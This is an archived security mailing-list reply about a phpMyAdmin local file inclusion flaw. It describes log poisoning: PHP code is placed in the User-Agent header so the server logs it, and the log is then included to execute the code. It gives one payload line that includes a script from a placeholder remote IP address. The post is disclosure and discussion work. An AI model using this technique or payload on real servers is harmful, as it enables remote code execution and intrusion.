<<< Date Index >>>     <<< Thread Index >>>

Re: [SECURITYREASON.COM] phpMyAdmin Local file inclusion 2.6.4-pl1



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On Mon, Oct 10 16:11, Maksymilian Arciemowicz <max@xxxxxxxxxxxx> wrote:
> - --- 0.Description ---
> phpMyAdmin 2.6.4 is a tool written in PHP intended to
> handle the administration of MySQL over the Web.
> [...]
> phpMyAdmin is very dangerous script.
> 
> - --- 1. Local file inclusion (Critical) ---
> File: ./libraries/grab_globals.lib.php

hi again,

since my post yesterday apparently had some trouble being delivered
because of a "suspicious attachment" (my pgp sig :)) i thought i'd
send it again.  and this time even as a reply to the right message... :)

in case you already got this, sorry for bothering twice,


andi

- ----- quote on ---------------------------------------------------------
this is a comment on the recent phpmyadmin vulnerability[1] discovered
by maksymilian arciemowicz.  i didn't really know where to post this,
so i hope this is the right place.

anyway, since i've used a file inclusion vulnerability in an older
version of phpmyadmin as a starting point for a security analysis last
weekend, and came up with a rather simple idea of how to use it for
unprivileged script execution of remote php code, i thought i'd post
this here.  actually i think this method could be used on any php-based
local include vuln, so i was wondering why i couldn't yet find anything
about it on the net...

okay, the problem with local file vulns is of course, that the contents
of the file being read are not evaluated.  but given php's include
statement the are -- if they contain a valid php statement.  now instead
of trying to upload a file containing php code (which wasn't possible in
my case), i ask myself if there was a way to use the server to create it
for me?

the idea that hit me before falling asleep was to send the code i needed
(like <?php include('http://xx.xx.xx.xx/script.php'); ?>) via the user
agent string, this way having the web server write it into a file for
me, and in a second step simply use the already existent local file vuln
to read and the server's log file and this way execute the code.

of course this method doesn't always work.  php mustn't run in safe
mode, the web server has to log user agent strings and the log files
must be accessible after privileges have been dropped.  since most
people are logging in combined format, i guess the last requirement is
the most critical one, but many logs are world-readable nevertheless.
also, enabled url-based includes make things easier, but they're not
stricly necessary.

so, provided with a php local file vuln and readable log files,
executing arbitrary commands comes down to locating a suitable log file
to include.  with a little guessing and the ability to read files (i.e.
the server configuration) this is not too difficult.

that's it.  any comments and feedback about this is most welcome,
especially since this approach seems much too simple to not having been
used before.  maybe someone can just point me to an already existing
discussion about this... :)

[1] http://www.securityfocus.com/bid/15053
- ----- quote off --------------------------------------------------------

- -- 
zeidler it consulting - http://zitc.de/ - info@xxxxxxx
karl-kunger-str 59 - 12435 berlin - telefon +49 30 25563779
keine softwarepatente in europa! - http://noepatents.eu.org/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (GNU/Linux)

iD8DBQFDTWK5V41LSDEbSrkRArkyAKCMW/Wg9XZ5BErRujvN5sjhXVeTfgCgl/Sx
CUrBPEZ35UWqjxofn9Pj9hQ=
=qJYs
-----END PGP SIGNATURE-----